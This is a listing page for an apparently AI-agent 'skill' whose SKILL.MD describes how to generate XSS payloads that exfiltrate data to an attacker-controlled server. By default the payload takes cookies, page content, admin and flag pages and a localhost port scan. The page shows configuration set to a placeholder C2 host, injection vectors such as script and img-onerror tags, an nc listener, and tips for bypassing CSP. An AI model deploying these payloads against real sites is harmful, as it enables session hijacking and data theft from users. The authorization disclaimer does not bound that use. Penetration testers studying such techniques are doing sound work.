OpenSkillIndex← back to search

Hacktricks-skills xss-data-exfiltration

Generate JavaScript payloads for XSS data exfiltration during authorized penetration testing. Use this skill whenever you need to extract sensitive data (cookies, page content, internal ports) from a compromised browser context through various channels (images, XHR, fetch, beacon, location). This is for security testing only - ensure you have explicit authorization before using these techniques.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/xss-cross-site-scripting/steal-info-js/SKILL.MD
source content

XSS Data Exfiltration

This skill helps you create JavaScript payloads to exfiltrate data from compromised browser contexts during authorized penetration testing. It supports multiple exfiltration channels to bypass different security controls.

When to Use This Skill

Use this skill when:

  • You've identified an XSS vulnerability and need to extract sensitive data
  • You need to test what data can be exfiltrated from a compromised page
  • You're conducting authorized security assessments
  • You need to bypass specific security controls (CSP, firewalls, etc.)

⚠️ Authorization Required: Only use these techniques on systems you own or have explicit written permission to test.

Exfiltration Methods

The skill supports 7 different exfiltration channels:

MethodDescriptionBest For
EXFIL_BY_IMG
Image tag requestsBypasses some WAFs, simple
EXFIL_BY_RQ_GET
XMLHttpRequest GETReliable, standard
EXFIL_BY_RQ_POST
XMLHttpRequest POSTLarger payloads, POST data
EXFIL_BY_FETCH_GET
Fetch API GETModern browsers, no-cors
EXFIL_BY_FETCH_POST
Fetch API POSTModern browsers, POST data
EXFIL_BY_NAV
navigator.sendBeaconReliable on page unload
EXFIL_BY_LOC
Location redirectFinal exfil, encoded data

Quick Start

1. Set Your Attacker Server

Replace the 

ATTACKER_SERVER
variable with your listener:

var ATTACKER_SERVER = "https://your-c2-server.com"

Common options:

  • Burp Collaborator: 
    https://xxxx.burpcollaborator.net
  • Your own server with a listener
  • nc -lvnp 8080
    for simple testing

2. Select Exfiltration Methods

Enable the methods you want to use:

var EXFIL_BY_IMG = false
var EXFIL_BY_RQ_GET = false
var EXFIL_BY_RQ_POST = true  // Recommended default
var EXFIL_BY_FETCH_GET = false
var EXFIL_BY_FETCH_POST = false
var EXFIL_BY_NAV = false
var EXFIL_BY_LOC = false

Recommendations:

  • Start with 
    EXFIL_BY_RQ_POST
    for reliability
  • Add 
    EXFIL_BY_NAV
    for page unload scenarios
  • Use 
    EXFIL_BY_LOC
    as a final exfil method
  • Enable multiple methods for redundancy

3. Generate the Payload

Use the bundled script to generate a customized payload:

./scripts/generate-xss-payload.sh --server "https://your-server.com" --methods "post,beacon" --output payload.js

Or manually copy from 

scripts/xss-exfil.js
and modify the configuration.

Data Collected by Default

The payload automatically exfiltrates:

  1. Cookies - 
    document.cookie
  2. Current URL - 
    document.URL
  3. Page Content - 
    document.documentElement.innerHTML
  4. Additional Pages - 
    /
    , 
    /admin
    , 
    /flag
    , 
    /flag.txt
  5. Internal Ports - Scans top 1000 common ports on localhost
  6. Window Messages - Listens for 
    onmessage
    events

Customization

Add Custom Data Collection

Add your own exfiltration calls:

exfil_info("custom_data", encode(someVariable))

Modify Port Scan

Edit the 

top_1000
array or add custom ports:

exfil_internal_port(8080)
exfil_internal_port(3000)

Change Exfil Timing

For location-based exfil, adjust the timeout:

setTimeout(exfil_info("finish", "finish", true), 5000) // 5 seconds

Testing Your Payload

1. Set Up a Listener

# Simple HTTP listener
nc -lvnp 8080

# Or use Burp Collaborator
# Or your own server with logging

2. Inject the Payload

Insert the JavaScript into the vulnerable parameter:

<script>[YOUR_PAYLOAD]</script>

Or use encoded variants if needed:

<img src=x onerror="[YOUR_PAYLOAD]">

3. Verify Exfiltration

Check your listener for incoming requests. You should see:

  • Cookie data
  • Page content
  • Port scan results
  • Any custom data you added

Troubleshooting

No Data Received

  1. Check CORS: Use 
    mode: "no-cors"
    for fetch requests
  2. Try Multiple Methods: Some may be blocked by CSP
  3. Check Server: Ensure your listener is running and accessible
  4. Verify XSS: Confirm the payload is actually executing

CSP Blocking

If Content Security Policy blocks your payload:

  • Try 
    EXFIL_BY_IMG
    (often allowed)
  • Use 
    EXFIL_BY_NAV
    (sendBeacon often bypasses CSP)
  • Consider DOM-based XSS vectors

Large Payloads

For large data:

  • Use 
    EXFIL_BY_RQ_POST
    or 
    EXFIL_BY_FETCH_POST
  • Chunk the data into multiple requests
  • Use 
    EXFIL_BY_LOC
    for final exfil (URL encoding)

Security Notes

  • Authorization: Only use on authorized targets
  • Data Handling: Be careful with sensitive data you exfiltrate
  • Cleanup: Remove test payloads after assessment
  • Documentation: Document findings for your report

References

Bundled Resources

  • scripts/xss-exfil.js
    - Base exfiltration payload
  • scripts/generate-xss-payload.sh
    - Payload generator script